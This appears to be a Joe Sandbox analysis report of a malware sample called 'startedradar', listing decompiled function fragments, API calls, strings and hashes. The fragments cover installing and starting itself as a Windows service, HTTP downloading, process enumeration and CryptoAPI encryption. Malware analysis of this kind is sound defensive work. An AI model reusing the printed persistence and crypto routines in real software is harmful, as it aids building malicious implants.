Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 60f52479b08e162c53082012bcdb086cc1de7d4ebfcc9201b4d149935f3f3105
Instruction ID: e4b476a86432a406d893e7be01a8b8031839ee08f2acec689a9f19b71ec6beee
Opcode Fuzzy Hash: 60f52479b08e162c53082012bcdb086cc1de7d4ebfcc9201b4d149935f3f3105
Instruction Fuzzy Hash: 9ED0C9B2C0D261AFC7A25B34BD162523EE19711341B0A04A2E444DB6A2E77848B58794

Uniqueness

Uniqueness Score: 0.00%

Function 0011F5E0, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

C-Code - Quality: 100%

			_entry_() {
				void* _t3;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				L0011D340();
				L0011DF80(); // executed
				_t3 = L00111030(); // executed
				_t11 = _t3;
				if(_t3 != 0) {
					L0011CE80(_t5, _t6, _t7, _t8, _t11); // executed
				}
				ExitProcess(0);
			}

0x0011f5e6
0x0011f5eb
0x0011f5f0
0x0011f5f5
0x0011f5f7
0x0011f5f9
0x0011f5f9
0x0011f600

APIs

ExitProcess.KERNEL32 ref: 0011F600

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: b7ce157e39f2b82fcdb66b00eb1d98e08bc00a2c8f03f06a9efc3a2dd90e2775
Instruction ID: f4c0590a338849ff50dc231e5bb423eec06045546e396c34ee774b3dc29b6e69
Opcode Fuzzy Hash: b7ce157e39f2b82fcdb66b00eb1d98e08bc00a2c8f03f06a9efc3a2dd90e2775
Instruction Fuzzy Hash: 9FC08C70226612A3D21C33F42C077CE78091F20750F000230FA60840C2AF50A1C280BB

Uniqueness

Uniqueness Score: 0.01%

Function 001115FC, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

APIs

ObtainUserAgentString.URLMON(00000000,?), ref: 0011160D

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: AgentObtainStringUser
String ID:
API String ID: 2681117516-0
Opcode ID: d61e93e7eaf1f9e4581971eafccb7ed4d28139f4241b5b95fd6f6d0280372cf8
Instruction ID: 814fcb492e5177e2baaaf2ec8eea3caf7ca1de824a75604efbaade16d356f13a
Opcode Fuzzy Hash: d61e93e7eaf1f9e4581971eafccb7ed4d28139f4241b5b95fd6f6d0280372cf8
Instruction Fuzzy Hash: CEC08CF0205204FBEB058B91CD08BEA767CAB04304F204492A706E08C0C3B1AA919A2E

Uniqueness

Uniqueness Score: 0.05%

Function 0011F883, Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON

APIs

CreateFileW.KERNEL32 ref: 0011F885

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 288dfabdaed7a787dcf91064c3c11b9351f0c9f11e4bac6abeb23f93eea72cd1
Instruction ID: 63b5fe3c13709bc193b9ce8e8f6e43e91f418bf8dd48069824a8a462cc771801
Opcode Fuzzy Hash: 288dfabdaed7a787dcf91064c3c11b9351f0c9f11e4bac6abeb23f93eea72cd1
Instruction Fuzzy Hash: E0B012324050354F9228363CB74C0EC120052453303260BB2DDB757DE49E208CD316C1

Uniqueness

Uniqueness Score: 0.01%

Function 00111BF0, Relevance: 1.5, APIs: 1, Instructions: 8processCOMMON

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00111BF4

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: cfaa4dbf5a2a424126ce82eaa87bd03e4f8cd86069c8c477193a96095a040129
Instruction ID: 53ef8c3f969a0c96b0ff3f9fa4ed42e53222cf354d3621c3c450a86edea66ed5
Opcode Fuzzy Hash: cfaa4dbf5a2a424126ce82eaa87bd03e4f8cd86069c8c477193a96095a040129
Instruction Fuzzy Hash: 90B02B3114591043C33C113904481744140114D3343290330CD3A939E056304C8B0441

Uniqueness

Uniqueness Score: 0.01%

Function 00112167, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

APIs

memset.NTDLL ref: 00112169

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 727491c3f809349e52da27c670f7a49e097efb748b5898bf5369501feec6148b
Instruction ID: 98ac34bcfb3c29911680b009e38eb18704903deec127964f34b6363cd090295e
Opcode Fuzzy Hash: 727491c3f809349e52da27c670f7a49e097efb748b5898bf5369501feec6148b
Instruction Fuzzy Hash: CDB09290912006AAEA1DA3752E0636E20554A603AAF180832EA0BC0D57FB22D2F694A3

Uniqueness

Uniqueness Score: 0.00%

Function 00111C4A, Relevance: 1.3, APIs: 1, Instructions: 7COMMON

APIs

CloseHandle.KERNEL32 ref: 00111C51

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e15aa77b856b1ced37924135bcd37b5c70b533ffb2f9ccb93815d5451e9a5d84
Instruction ID: 8474bdadd2b97709b662d6896e56068da7ef8935b18fa8a5f363539abceb6641
Opcode Fuzzy Hash: e15aa77b856b1ced37924135bcd37b5c70b533ffb2f9ccb93815d5451e9a5d84
Instruction Fuzzy Hash: DDB0122105E51AF3851E13F54C247E9152C0E223447100420E40280C40D704C9D15D5A

Uniqueness

Uniqueness Score: 0.04%

Non-executed Functions

Function 0011FDC9, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 56
memoryserviceUNIQUE

C-Code - Quality: 30%

			E0011FDC9(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t21;
				void* _t28;
				void* _t31;
				int _t32;
				void* _t34;

				_t28 = __edi;
				asm("popfd");
				asm("int3");
				_t31 = L00111D00(__ecx, __edx, __edi);
				 *0x1259dc(_t34 - 0x20c, 0x104, _t31, "C:\Windows\system32\startedradar.exe");
				HeapFree(GetProcessHeap(), 0, _t31);
				_t21 = CreateServiceW(__edi, "startedradar", "startedradar", 0x12, 0x10, 2, 0, _t34 - 0x20c, 0, 0, 0, 0, 0);
				if(_t21 != 0) {
					__eflags = L0011FA00(_t10, __edi, _t34 - 4, __edi);
					if(__eflags != 0) {
						goto 0x301e88;
						asm("int3");
						asm("int3");
						 *0x124aac();
						HeapFree(GetProcessHeap(), 0, _t31);
					}
				} else {
					asm("popfd");
					asm("int3");
					asm("int3");
					_t21 = OpenServiceW(??, ??, ??);
				}
				_t41 = _t21;
				if(_t21 == 0) {
					_t32 = 0;
					__eflags = 0;
				} else {
					_t32 = StartServiceW();
					CloseServiceHandle(_t21);
				}
				L0011FD00(_t28, _t32, _t41);
				CloseServiceHandle(_t28);
				return _t32;
			}

0x0011fdc9
0x0011fdc9
0x0011fdca
0x0011fdd0
0x0011fde4
0x0011fdf7
0x0011fe27
0x0011fe2b
0x0011fe49
0x0011fe4b
0x0011fe4d
0x0011fe52
0x0011fe53
0x0011fe54
0x0011fe64
0x0011fe64
0x0011fe2d
0x0011fe32
0x0011fe33
0x0011fe34
0x0011fe3b
0x0011fe3b
0x0011fe6a
0x0011fe6c
0x0011fe84
0x0011fe84
0x0011fe6e
0x0011fe7a
0x0011fe7c
0x0011fe7c
0x0011fe88
0x0011fe8e
0x0011fe9c

APIs

_snwprintf.NTDLL ref: 0011FDE4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011FDF0
HeapFree.KERNEL32(00000000), ref: 0011FDF7
CreateServiceW.ADVAPI32(?,startedradar,startedradar,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0011FE21
CloseServiceHandle.ADVAPI32(?,?,startedradar,startedradar,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0011FE8E

Strings

C:\Windows\system32\startedradar.exe, xrefs: 0011FDD8
startedradar, xrefs: 0011FE16, 0011FE1B

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: HeapService$CloseCreateFreeHandleProcess_snwprintf
String ID: C:\Windows\system32\startedradar.exe$startedradar
API String ID: 4287406958-2267960288
Opcode ID: 60c28f1856a6a243d078bb9ffda4ce6dfcffd44edeffeed39a0724b4844cca5d
Instruction ID: c0c9bc24da28d2590bcf0d8b81ef83f920710dda347265416f4b96e403e88a2d
Opcode Fuzzy Hash: 60c28f1856a6a243d078bb9ffda4ce6dfcffd44edeffeed39a0724b4844cca5d
Instruction Fuzzy Hash: 1801F731346314B7D720A7E06D8AFFFB25C9B04751F100475BA05964C2DBA048A29291

Uniqueness

Uniqueness Score: 100.00%

Function 00112217, Relevance: 12.1, APIs: 8, Instructions: 60memoryencryptionCOMMON

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 00112223
RtlAllocateHeap.NTDLL(00000000), ref: 0011222A
CryptDuplicateHash.ADVAPI32(?,?,?,?), ref: 0011224F
memcpy.NTDLL(?,?,?,?,?,?), ref: 00112264
CryptEncrypt.ADVAPI32(?,?,00000001,?,?,?), ref: 00112281
CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 001122CC
GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 001122DA
HeapFree.KERNEL32(00000000), ref: 001122E1

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$Crypt$HashProcess$AllocateDestroyDuplicateEncryptFreememcpy
String ID:
API String ID: 1815259051-0
Opcode ID: 4c023afe6b251330ab85abe472b8dce4c1d2da728c39effe894941ce969f0fa3
Instruction ID: 84f4d55fcae64e3aabcd583fa5b7b3005495dde5b926e4b03352641b9ddcc1aa
Opcode Fuzzy Hash: 4c023afe6b251330ab85abe472b8dce4c1d2da728c39effe894941ce969f0fa3
Instruction Fuzzy Hash: 4911F671A00209FFDB218FA4DD48BAEBFB9FF08341F144165F909D6560E7718AA1DB90

Uniqueness

Uniqueness Score: 0.09%

Function 0011233E, Relevance: 10.6, APIs: 7, Instructions: 59memoryencryptionCOMMON

APIs

RtlAllocateHeap.NTDLL ref: 00112347
CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 0011236D
memcpy.NTDLL(?,?), ref: 00112381
CryptDecrypt.ADVAPI32(?,?,00000001,00000000,?,?), ref: 0011239D
CryptDestroyHash.ADVAPI32(?,?,?), ref: 001123CC
GetProcessHeap.KERNEL32(00000000), ref: 001123DF
HeapFree.KERNEL32(00000000), ref: 001123E6

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CryptHeap$Hash$AllocateDecryptDestroyDuplicateFreeProcessmemcpy
String ID:
API String ID: 1169412687-0
Opcode ID: 4c171678583843dccf469af28516e888105b8500246337209bd9e2461e14aed6
Instruction ID: 41237d34a419fbf98b5278e9296d66a95b3fd977ac8bf42a075469dc73f4240f
Opcode Fuzzy Hash: 4c171678583843dccf469af28516e888105b8500246337209bd9e2461e14aed6
Instruction Fuzzy Hash: EC114671A00209FFDB218F94DC88BADBBB9FF08301F140161F915E66A0E77199A19B51

Uniqueness

Uniqueness Score: 7.75%

Function 00111679, Relevance: 9.1, APIs: 6, Instructions: 77
memorynetworkfileCOMMON

C-Code - Quality: 94%

			E00111679(void* __ecx, void** __edx) {
				signed int _t19;
				void _t24;
				long _t33;
				void* _t39;
				void** _t40;
				void _t42;
				long _t45;
				void* _t48;

				 *(_t48 - 0x10) = __edx;
				 *(_t48 - 0xc) = __ecx;
				 *(_t48 - 8) = 4;
				_t19 = HttpQueryInfoW(__ecx, 0x20000005, _t48 - 4, _t48 - 8, 0);
				_t45 = 0;
				_t42 = 0;
				asm("sbb ebx, ebx");
				_t33 =  ~_t19 &  *(_t48 - 4);
				if(_t33 <= 0) {
					L10:
					return _t42;
				} else {
					_t39 = RtlAllocateHeap(GetProcessHeap(), 8, _t33);
					 *(_t48 - 4) = _t39;
					if(_t39 == 0) {
						goto L10;
					} else {
						 *(_t48 - 8) = 0;
						if(_t33 == 0) {
							L8:
							_t24 = HeapFree(GetProcessHeap(), 0, _t39);
							if(_t42 != 0) {
								goto L9;
							}
							goto L10;
						} else {
							while(1) {
								_t24 = InternetReadFile( *(_t48 - 0xc), _t39 + _t45, _t33 - _t45, _t48 - 8);
								_t42 = _t24;
								if(_t42 == 0) {
									break;
								}
								_t39 =  *(_t48 - 8);
								if(_t39 == 0) {
									L9:
									goto 0x3002e4;
									asm("int3");
									 *_t39 = _t24;
									 *(_t39 + 4) = _t45;
									goto L10;
								} else {
									_t45 = _t39 + _t45;
									_t39 =  *(_t48 - 4);
									if(_t45 < _t33) {
										continue;
									} else {
										_t40 =  *(_t48 - 0x10);
										 *_t40 = _t39;
										_t40[1] = _t45;
										return _t42;
									}
								}
								goto L11;
							}
							_t39 =  *(_t48 - 4);
							goto L8;
						}
					}
				}
				L11:
			}

APIs

HttpQueryInfoW.WININET(?,20000005,?,?,00000000), ref: 00111698
GetProcessHeap.KERNEL32(00000008,?,?,20000005,?,?,00000000), ref: 001116B7
RtlAllocateHeap.NTDLL(00000000,?,20000005), ref: 001116BE
InternetReadFile.WININET(?,?,?,?), ref: 001116E4
GetProcessHeap.KERNEL32(00000000,00000000,?,20000005,?,?,00000000), ref: 00111719
HeapFree.KERNEL32(00000000,?,20000005), ref: 00111720

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Heap$Process$AllocateFileFreeHttpInfoInternetQueryRead
String ID:
API String ID: 2400572943-0
Opcode ID: ca7418f0bef61f90f7893c7e837026dc34c704fb78d1035f145697aee15a61ec
Instruction ID: 3d5036dc8588b51755042882c05a4b2b63883d8be801dc7c149cffee8fcdba30
Opcode Fuzzy Hash: ca7418f0bef61f90f7893c7e837026dc34c704fb78d1035f145697aee15a61ec
Instruction Fuzzy Hash: 74214C76B04208BBDB18CF98DC98BEDBBBAEB48311F1401BDEA09D7680DB714D418B50

Uniqueness

Uniqueness Score: 4.65%

Function 00112292, Relevance: 6.0, APIs: 4, Instructions: 36
memoryencryptionCOMMON

C-Code - Quality: 50%

			E00112292(void* __eax, void* __ebx, void** __edi) {
				void** _t23;
				void* _t25;
				void* _t27;

				_t23 = __edi;
				if(L00112080(__eax,  *((intOrPtr*)(__eax + 4)),  *((intOrPtr*)(__eax + 8))) != 0) {
					 *((intOrPtr*)(_t27 - 0x14)) = 0x14;
					 *0x124afc( *((intOrPtr*)(_t27 + 8)), 2, __ebx + 0x60, _t27 - 0x14, _t25);
					_t25 =  !=  ? 1 : _t25;
				}
				 *0x124a38( *((intOrPtr*)(_t27 + 8)));
				if(_t25 == 0) {
					HeapFree(GetProcessHeap(), 0,  *_t23);
					 *_t23 = 0;
					_t23[1] = 0;
				}
				return _t25;
			}

0x00112292
0x001122a2
0x001122a8
0x001122b9
0x001122c6
0x001122c6
0x001122cc
0x001122d4
0x001122e1
0x001122e7
0x001122ed
0x001122ed
0x001122fc

APIs

CryptGetHashParam.ADVAPI32(?,00000002,?,?), ref: 001122B9
CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 001122CC
GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 001122DA
HeapFree.KERNEL32(00000000), ref: 001122E1

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CryptHashHeap$DestroyFreeParamProcess
String ID:
API String ID: 2852584936-0
Opcode ID: a589abd22937f55e1e94819d929b8402cca36810b3950c2f23e6ccb39172f505
Instruction ID: dd5a8fb4b45e5662338c8ca5543a7f317d105390d4d281e0b15edced081f193b
Opcode Fuzzy Hash: a589abd22937f55e1e94819d929b8402cca36810b3950c2f23e6ccb39172f505
Instruction Fuzzy Hash: E5F06271600105AFDB209F90DC49BAABBA9FF04301F004125FD09D76A1D7B1CDA1CB91

Uniqueness

Uniqueness Score: 0.09%

Function 001123B0, Relevance: 6.0, APIs: 4, Instructions: 27
memoryencryptionCOMMON

C-Code - Quality: 23%

			E001123B0(void* __eax, long* __ebx, void** __edi, void* __esi) {
				void* _t17;
				void* _t19;

				asm("pushad");
				 *0x124994( *((intOrPtr*)(_t19 - 8)),  *((intOrPtr*)(_t19 - 0xc)));
				_t17 =  !=  ? 1 : __esi;
				 *0x124a38( *((intOrPtr*)(_t19 - 8)));
				if(_t17 == 0) {
					HeapFree(GetProcessHeap(), 0,  *__edi);
					 *__edi = 0;
					 *__ebx = 0;
				}
				return _t17;
			}

0x001123b2
0x001123b9
0x001123c6
0x001123cc
0x001123d4
0x001123e6
0x001123ec
0x001123f2
0x001123f2
0x00112400

APIs

CryptVerifySignatureW.ADVAPI32(?,?), ref: 001123B9
CryptDestroyHash.ADVAPI32(?,?,?), ref: 001123CC
GetProcessHeap.KERNEL32(00000000), ref: 001123DF
HeapFree.KERNEL32(00000000), ref: 001123E6

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CryptHeap$DestroyFreeHashProcessSignatureVerify
String ID:
API String ID: 2013711131-0
Opcode ID: 23a8ac9ae169aff637b63b11af86563990ab073609840ad118158abc570945ed
Instruction ID: 97df98ed2b80eaccff943a1d4c4d6b8158f88a2901039b7e77293ac23c9b43e9
Opcode Fuzzy Hash: 23a8ac9ae169aff637b63b11af86563990ab073609840ad118158abc570945ed
Instruction Fuzzy Hash: 84E06D31A04214FBDB260F94EC487ACBFB6FF08312F010065E90A965A0E7B608F29B81

Uniqueness

Uniqueness Score: 7.75%

Function 001121A9, Relevance: 6.0, APIs: 4, Instructions: 14
encryptionCOMMON

C-Code - Quality: 68%

			E001121A9(void* __eax) {
				void* _t3;

				_t3 =  *0x124ab8();
				if(_t3 == 0) {
					CryptDestroyKey( *0x127ca8);
					CryptDestroyKey( *0x127ca4);
					CryptReleaseContext( *0x127ca0, 0);
					return 0;
				} else {
					goto 0x300808;
					return _t3;
				}
			}

0x001121ae
0x001121b6
0x001121c4
0x001121d0
0x001121de
0x001121e6
0x001121b8
0x001121b8
0x001121bd
0x001121bd

APIs

CryptCreateHash.ADVAPI32 ref: 001121AE
CryptDestroyKey.ADVAPI32 ref: 001121C4
CryptDestroyKey.ADVAPI32 ref: 001121D0
CryptReleaseContext.ADVAPI32(00000000), ref: 001121DE

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Crypt$Destroy$ContextCreateHashRelease
String ID:
API String ID: 4057265880-0
Opcode ID: 02b2d5da9872761cf8b7d3d79ce0717280008d8cefe629b0551deb92deb398ea
Instruction ID: 492d5ab0330a31b3a205ffec5c239de3744709a539e37ebbf8c74776f646eb6a
Opcode Fuzzy Hash: 02b2d5da9872761cf8b7d3d79ce0717280008d8cefe629b0551deb92deb398ea
Instruction Fuzzy Hash: CCD06C3019A102BFDB622F74EE09B463BA5EB18343B510424B102E5CB0EF3194F2AB48

Uniqueness

Uniqueness Score: 0.02%

Function 0011FA77, Relevance: 4.5, APIs: 3, Instructions: 33serviceCOMMON

APIs

EnumServicesStatusExW.ADVAPI32 ref: 0011FA77
GetTickCount.KERNEL32 ref: 0011FA85
OpenServiceW.ADVAPI32(?,?,00000001), ref: 0011FABF

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CountEnumOpenServiceServicesStatusTick
String ID:
API String ID: 3995870938-0
Opcode ID: 0ea0814cdd326c8be6561a8702a7847ef340791a99cbbd3b70e38b44d700b0d8
Instruction ID: d8bdfd45a2d228b914a76f7a31f0a86c0a28c77e71d4175af036b232c74f4e94
Opcode Fuzzy Hash: 0ea0814cdd326c8be6561a8702a7847ef340791a99cbbd3b70e38b44d700b0d8
Instruction Fuzzy Hash: 0BF08C32E04229CBCF258FA8C9957EDBBB4BF08300F110039E916B3250D33098918E54

Uniqueness

Uniqueness Score: 0.03%

Function 00112125, Relevance: 4.5, APIs: 3, Instructions: 15
encryptionCOMMON

C-Code - Quality: 16%

			E00112125(void* __eax) {
				int _t8;
				void* _t10;

				_t8 = CryptImportKey();
				LocalFree( *(_t10 - 4));
				if(_t8 == 0) {
					CryptReleaseContext( *0x127ca0, 0);
				}
				return _t8;
			}

0x00112133
0x00112135
0x0011213d
0x00112147
0x00112147
0x00112153

APIs

CryptImportKey.ADVAPI32 ref: 0011212A
LocalFree.KERNEL32(?), ref: 00112135
CryptReleaseContext.ADVAPI32(00000000), ref: 00112147

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Crypt$ContextFreeImportLocalRelease
String ID:
API String ID: 202888279-0
Opcode ID: b623fe1910e0fd0721478b98559b4ed57659b5e33a97da289a01907e065d3277
Instruction ID: e0ac0330f1d6cefc461a7f4b551b1908a5399cee8c3f0d7357b7979afa492c79
Opcode Fuzzy Hash: b623fe1910e0fd0721478b98559b4ed57659b5e33a97da289a01907e065d3277
Instruction Fuzzy Hash: 00D09E35A55124FBCB316FA4BD087597761E7087A2F510551E905E2A60D7314CB196C0

Uniqueness

Uniqueness Score: 0.02%

Function 0011218B, Relevance: 4.5, APIs: 3, Instructions: 12encryptionCOMMON

APIs

CryptGenKey.ADVAPI32 ref: 00112190
CryptDestroyKey.ADVAPI32 ref: 001121D0
CryptReleaseContext.ADVAPI32(00000000), ref: 001121DE

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: Crypt$ContextDestroyRelease
String ID:
API String ID: 1322390979-0
Opcode ID: e72a71832c3b858c351446189514910b603d1a21bf807c0e7b3cf90d6f9a5604
Instruction ID: 57ce80a926d492c670985c2e0e8a018c3d0c72db815514e5eaa21b28a1270dd8
Opcode Fuzzy Hash: e72a71832c3b858c351446189514910b603d1a21bf807c0e7b3cf90d6f9a5604
Instruction Fuzzy Hash: 5CD0C93015A001BFDB222F30AE48B063B64AB48742F510020B102E5CF0DF2094F2EA14

Uniqueness

Uniqueness Score: 0.02%

Function 00112089, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13encryptionCOMMON

APIs

CryptExportKey.ADVAPI32(?,?,00000001,00000040,?), ref: 0011209B

Strings

l, xrefs: 00112089

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: CryptExport
String ID: l
API String ID: 3389274496-2517025534
Opcode ID: 180274ee61bae32dad82ca270d94b4c41eba335296074d9a30fe258d65f2e8d7
Instruction ID: 2179d6ec1e925664ad4a16c847ca69afdd1896cb39a37ab1b52672039b53c97e
Opcode Fuzzy Hash: 180274ee61bae32dad82ca270d94b4c41eba335296074d9a30fe258d65f2e8d7
Instruction Fuzzy Hash: 6AD012F0201308FAF7354B60CD55FFB356CA700B00F2001197202A24C0D6B9E5519934

Uniqueness

Uniqueness Score: 0.02%

Function 0011FA14, Relevance: 3.0, APIs: 2, Instructions: 20serviceCOMMON

APIs

EnumServicesStatusExW.ADVAPI32(?,?,00000030,00000003), ref: 0011FA27
GetLastError.KERNEL32(?,?,00000030,00000003), ref: 0011FA35

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: EnumErrorLastServicesStatus
String ID:
API String ID: 3481363347-0
Opcode ID: 708e9c6320a608722f47fe6732383e986eae74331095a6f4c874a433d9b0b7d2
Instruction ID: 805e064070608aa2b46962de75e57ab4047e0a1178b0af35c3716b2cbd2c9e17
Opcode Fuzzy Hash: 708e9c6320a608722f47fe6732383e986eae74331095a6f4c874a433d9b0b7d2
Instruction Fuzzy Hash: EDE0C230F046446BE3354B42CC68F7BA46CEB94B00F10003CF005E1580D3A04E818A65
